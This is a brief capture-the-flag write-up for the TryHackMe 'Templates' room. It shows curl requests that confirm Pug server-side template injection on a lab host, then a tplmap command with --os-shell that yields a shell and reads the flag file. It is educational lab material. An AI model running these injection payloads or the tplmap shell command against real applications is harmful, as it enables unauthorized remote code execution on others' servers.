TryHackMe WriteUp: Templates

One9twO
2 min readNov 16, 2022

--

Here’s a write up for https://tryhackme.com/room/templates

Recon

After starting up the machine, as per instruction there’s a website running on port 5000. In my case:

http://10.10.33.8:5000/

Click on the Convert to HTML button, it’ll convert the template to HTML.

To make it easier to visualize the request, I replaced the entire content with ‘aaa’, then opened the web console to capture the request.

It was a POST request to /render with payload of ‘template=aaa’.

An equivalent curl command is:

# curl -X POST http://10.10.33.8:5000/render -d 'template=aaa'

<html><head></head><body><pre>&lt;x&gt;&lt;/aaa&gt;</pre></body></html>

Exploit

A google search of ‘pug template injection’ lead me to this:

To test if the app is vulnerable to SSTI (which was also a hint under ‘similar content’ in the room description), I have used another curl command:

# curl -X POST http://10.10.33.8:5000/render -d 'template=%23%7B7*7%7D '
<html><head></head><body><pre>&lt;49&gt; &lt;/49&gt;</pre></body></html>

The command injected the equivalent of {{ 7*7 }}. A vulnerable app will return the result of 7*7, like above.

To exploit, use https://github.com/epinna/tplmap/. Since this is a POST request, you will need a couple more args in the ./tplmap.py command:

./tplmap.py -X POST --engine pug --os-shell -u http://10.10.33.8:5000/render -d 'template=abc'

That dropped me in a shell, and the flag was right there :)

linux $ whoami
user
linux $ ls
app.js
flag.txt
node_modules
package-lock.json
package.json
views
linux $ cat flag.txt
flag{the-hash}

--

--